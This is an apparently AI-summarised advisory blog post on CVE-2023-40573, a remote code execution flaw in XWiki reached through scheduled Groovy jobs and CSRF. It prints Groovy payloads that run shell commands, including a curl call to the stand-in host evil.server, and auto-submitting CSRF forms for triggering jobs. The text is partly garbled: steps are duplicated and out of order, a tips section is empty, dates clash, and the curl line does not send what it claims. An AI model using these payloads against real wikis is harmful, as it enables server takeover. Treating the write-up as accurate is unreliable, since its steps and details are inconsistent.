CVE-2023-40573 - Remote Code Execution in XWiki Platform via Scheduled Jobs Exploit

Published: June 2024
Severity: High

Executive Summary

An important security vulnerability tracked as CVE-2023-40573 was recently found in the XWiki Platform, a widely-used open-source wiki platform. This bug allows remote code execution (RCE) by attackers who have regular edit rights, making it especially dangerous for collaborative or lightly protected XWiki instances.

In this long read, we’ll break down how the vulnerability works, provide code snippets for understanding and reproducing the issue, and give advice on mitigation. We'll also link to official resources.

What’s XWiki?

XWiki lets people create and edit documents cooperatively. It also has a powerful feature: running scheduled jobs through Groovy scripts—essentially programmable tasks that can execute server-side code.

The Core Problem

1. Scheduled jobs are Groovy scripts: XWiki lets users add or edit scheduled jobs that are actually Groovy code, which can do almost anything on the server.
2. Insufficient Permission Checks: When the scheduler runs a job, it checks the “content author” of the job to see if they have “programming” rights (high-level privilege for running arbitrary scripts).
3. But... Editing Documents Changes Nothing: If someone edits the job or adds a new script, XWiki does not update the “content author” property—so past permissions still apply!
4. Combined With a CSRF Weakness: The job scheduler allows cross-site request forgery (CSRF), meaning a malicious web page or email link can trick a legitimate user into submitting a crafted request.

The Impact

Even users without programming rights but with basic edit access can sneak malicious code into jobs and, leveraging CSRF, execute arbitrary Groovy code with the server's privileges. Successful exploits leave behind suspicious logs ("Job content executed").

Exploit Workflow: How Attackers Can Abuse CVE-2023-40573

Here’s a step-by-step of how a real attack could work.

1. Attacker Needs Edit Rights

The attacker needs edit permissions on the target wiki. This is not full admin access—just the right to edit certain wiki documents.

2. Find or Create a Scheduled Job Document

XWiki stores jobs as documents (wiki pages). The attacker edits or creates such a document and adds malicious Groovy code to it.

println "Hacked!"
// Dangerous: execute a shell command on the remote server
def proc = "id".execute()
println proc.text

3. “Content Author” Isn’t Updated

Even if the attacker doesn't have programming rights, XWiki still checks the old content author who might have had those rights in the past.

4. Trigger the Job Via CSRF

The attacker tricks an authorized wiki user into visiting a malicious page that sends a POST request to the job scheduler endpoint:

<!-- Example: Demonstrating a CSRF payload -->
<form id="h4x" action="https://victim-xwiki.org/xwiki/bin/run/Scheduler/JobScheduler"; method="POST">
  <input type="hidden" name="jobName" value="MaliciousJob" />
  <input type="hidden" name="action" value="run" />
</form>
<script>document.getElementById('h4x').submit();</script>

The wiki user’s browser executes the crafted request, starting the malicious job.

Look for this error log message after a successful attack

Job content executed

Update or create Scheduler.MaliciousJob with this content

println "Malicious code running!"
def proc = "curl http://evil.server/capture?data=whoami".execute()
proc.waitFor()

Step 2: CSRF Trigger (Host on Attacker’s Website)

<form id="csrfForm" action="https://target-xwiki.org/xwiki/bin/run/Scheduler/MaliciousJob"; method="POST">
  <input type="hidden" name="action" value="run" />
</form>
<script>
document.getElementById('csrfForm').submit();
</script>

Step 3: Get a Regular User to Visit Your Webpage

Once any valid user (even without programming rights) who can schedule jobs loads your attacker page, the job will run server-side.

Official References

- XWiki Security Advisory – CVE-2023-40573
- XWiki Issue Tracker
- XWiki Patch Release 14.10.9
- XWiki Patch Release 15.4RC1

Mitigation

Patch Immediately:
Upgrade XWiki to 14.10.9 or 15.4RC1 (or any later versions) where the bug is fixed.

Other Safety Tips:

Conclusion

CVE-2023-40573 is a critical reminder that even “editors” of collaborative platforms can become privileged code execution attackers if permission checks are incomplete. All XWiki installations should be updated as soon as possible, and admins should review user permissions and logs for suspicious activity.

Stay safe and patch fast!

By:
_XWiki Security Community, summarized and explained by OpenAI GPT-4._
Date: June 2024


Disclaimer:
This write-up is for educational and defensive purposes only. Unauthorized exploitation of systems is illegal. Always test only in environments you own or have explicit permission to use.

Timeline

Published on: 08/24/2023 02:15:00 UTC
Last modified on: 09/01/2023 17:09:00 UTC